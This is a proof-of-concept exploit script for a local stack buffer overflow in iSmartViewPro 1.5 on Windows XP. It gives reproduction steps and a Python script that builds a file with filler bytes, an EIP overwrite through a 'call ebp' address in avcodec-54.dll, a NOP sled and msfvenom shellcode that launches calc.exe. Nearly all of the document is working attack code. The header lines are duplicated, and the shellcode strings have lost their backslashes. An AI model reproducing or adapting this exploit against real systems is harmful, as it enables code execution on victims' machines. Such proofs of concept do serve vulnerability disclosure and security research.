iSmartViewPro 1.5 Buffer Overflow

# Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# D # Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-12
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
# Tested Version: 1.5
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name
# "exploit.txt" just copy the text inside "exploit.txt" and start the
# iSmartViewPro 1.5 program and click on "System Setup" in the
# "Save Path for Snapshot and Record file" field. Paste the content of
# "exploit.txt" and click on Save. You will see a sweet calculator poped up.
# Greetz: @FuzzySec @LiveOverflow @hexachordanu @HansSecurity

#!/usr/bin/python

buffer = "A" * 272
#0x6a192c79 : call ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [avcodec-54.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:Program FilesiSmartViewProavcodec-54.dll)

eip = "x79x2Cx19x6A"
nops = "x90" *12
#badchar x00x0ax0d
#msfvenom -p windows/exec cmd=calc.exe -b 'x00x0ax0d' -f python
buf = ""
buf += "xbax9ax98xafx7exddxc2xd9x74x24xf4x5fx29"
buf += "xc9xb1x31x83xc7x04x31x57x0fx03x57x95x7a"
buf += "x5ax82x41xf8xa5x7bx91x9dx2cx9exa0x9dx4b"
buf += "xeax92x2dx1fxbex1exc5x4dx2bx95xabx59x5c"
buf += "x1ex01xbcx53x9fx3axfcxf2x23x41xd1xd4x1a"
buf += "x8ax24x14x5bxf7xc5x44x34x73x7bx79x31xc9"
buf += "x40xf2x09xdfxc0xe7xd9xdexe1xb9x52xb9x21"
buf += "x3bxb7xb1x6bx23xd4xfcx22xd8x2ex8axb4x08"
buf += "x7fx73x1ax75xb0x86x62xb1x76x79x11xcbx85"
buf += "x04x22x08xf4xd2xa7x8bx5ex90x10x70x5fx75"
buf += "xc6xf3x53x32x8cx5cx77xc5x41xd7x83x4ex64"
buf += "x38x02x14x43x9cx4fxcexeax85x35xa1x13xd5"
buf += "x96x1exb6x9dx3ax4axcbxffx50x8dx59x7ax16"
buf += "x8dx61x85x06xe6x50x0exc9x71x6dxc5xaex8e"
buf += "x27x44x86x06xeex1cx9bx4ax11xcbxdfx72x92"
buf += "xfex9fx80x8ax8ax9axcdx0cx66xd6x5exf9x88"
buf += "x45x5ex28xebx08xccxb0xc2xafx74x52x1b"
pad = "B" * (600 - len(eip) - len(buffer) - len(nops) - len(buf) )

payload = buffer + eip + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"